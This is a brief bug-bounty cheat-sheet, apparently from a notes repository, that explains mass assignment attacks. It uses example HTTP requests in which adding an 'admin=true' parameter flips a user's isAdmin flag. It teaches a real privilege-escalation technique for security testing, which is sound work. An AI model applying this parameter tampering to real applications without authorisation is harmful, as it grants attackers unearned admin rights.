AllAboutBugBounty/Mass Assignment.md
2022-07-09 22:35:32 +07:00

40 lines
808 B
Markdown

# Mass Assignment Attack
## Introduction
Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS
## How to exploit
- Normal request
```
POST /editdata HTTP/1.1
Host: target.com
...
username=daffa
```
The response
```
HTTP/1.1 200 OK
...
{"status":"success","username":"daffainfo","isAdmin":"false"}
```
- Modified Request
```
POST /editdata HTTP/1.1
Host: target.com
...
username=daffa&admin=true
```
```
HTTP/1.1 200 OK
...
{"status":"success","username":"daffainfo","isAdmin":"true"}
```
## References
* [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)